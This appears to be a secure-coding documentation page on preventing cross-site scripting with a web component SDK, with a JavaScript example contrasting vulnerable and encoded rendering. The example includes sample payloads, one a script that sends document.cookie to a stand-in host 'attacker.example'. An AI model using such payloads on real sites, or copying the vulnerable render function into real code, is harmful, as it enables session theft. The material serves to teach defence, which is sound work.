Creating Secure Applications¶
This topic describes the steps required to prevent common web-application attacks such as Cross-Site Scripting (XSS). With XSS, an attacker exploits a vulnerability in your application to run script of their choosing in your users' browsers, which can cause significant damage to your business and technical infrastructure. Using Web Components from the Web Component SDK library without also implementing the security measures described here is not recommended: the components do not replace application-level input validation and output encoding. You defend against common XSS attacks by validating input and encoding data on the server side before it is placed on the page.
Attackers can deliver malicious code through several channels, such as:
- Input elements on the page
- HTTP request headers and bodies
- URLs and query strings, including links that point to invalid or private data
- Cookies
There are multiple types of XSS attacks, including:
Reflected XSS Attacks¶
Stored XSS Attacks¶
Also referred to as persistent XSS, this attack happens when an attacker submits a malicious payload that the server stores (for example in a comment, profile field, or record). The payload is later included in responses to other users who access the application or website, and runs in their browsers.
DOM XSS Attacks¶
Sanitize All Input and Handle Data Carefully¶
To prevent XSS attacks, you should make sure that user input cannot be interpreted as code using the following methods:
- Encode data for the HTML context it is placed into (element content or a quoted attribute value) before inserting it into the page.
These rules apply to any web component that renders user-supplied data, such as the Grid and Text Area, and must be followed before such components are safe to deploy in a production environment. Always validate all input data on the server, whether the application is hosted locally or available publicly, because checks that run only in the browser can be bypassed by an attacker who sends requests directly.
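The two rules above (encode before inserting into HTML, and validate all input) shown together in working code. This is an added example, not code from the Web Component SDK documentation or library; the comment-list markup (`<li data-author=...>`), the display-name format, and the payload strings are assumptions constructed for illustration.

```javascript
// Added example, not part of the Web Component SDK documentation: a minimal
// HTML encoder, a vulnerable/hardened pair of render functions, and an
// allowlist validator. The <li data-author=...> markup and the display-name
// rules are assumptions chosen for illustration.

// Characters with special meaning in HTML element content and in quoted
// attribute values, mapped to their entity form.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};

// Encode a value for insertion as HTML text or as a quoted attribute value.
// Non-strings (including null/undefined) are coerced so a missing field
// cannot bypass the encoder.
function encodeHtml(value) {
  return String(value ?? "").replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: untrusted data is concatenated straight into the markup, so a
// payload stored in a comment body or an author name executes on render.
function renderCommentVulnerable(author, body) {
  return `<li data-author="${author}">${body}</li>`;
}

// Hardened: each interpolation is encoded for its context. The attribute is
// double-quoted and the encoder escapes both quote characters, so the author
// value cannot close the attribute and inject a new one.
function renderCommentSafe(author, body) {
  return `<li data-author="${encodeHtml(author)}">${encodeHtml(body)}</li>`;
}

// Allowlist validation for a field whose shape is known (here a display name
// of 1-40 letters, digits, spaces, underscores, dots or hyphens). Run this on
// the server before storing the value; it narrows what is accepted but does
// not replace output encoding at render time.
const DISPLAY_NAME = /^[\p{L}\p{N} _.-]{1,40}$/u;

function validateDisplayName(value) {
  return typeof value === "string" && DISPLAY_NAME.test(value);
}

// Constructed payloads of the kind submitted through a form field or query
// string: one breaks out of an attribute, the other injects a script element.
const ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)';
const BODY_PAYLOAD =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Render both variants with the payloads so the difference is visible.
function demo() {
  return {
    rejectedByValidation: !validateDisplayName(ATTR_PAYLOAD),
    vulnerable: renderCommentVulnerable(ATTR_PAYLOAD, BODY_PAYLOAD),
    safe: renderCommentSafe(ATTR_PAYLOAD, BODY_PAYLOAD),
  };
}

console.log(demo());
```

When the same data is rendered in the browser rather than in a server-built string, prefer DOM APIs that do not parse markup (`textContent`, `setAttribute`) over `innerHTML`; they insert the value as data, so no encoding step is needed. Encoding is only sufficient for the HTML text and quoted-attribute contexts shown here; data placed into a URL, an inline script, or a CSS value needs the encoder for that context instead.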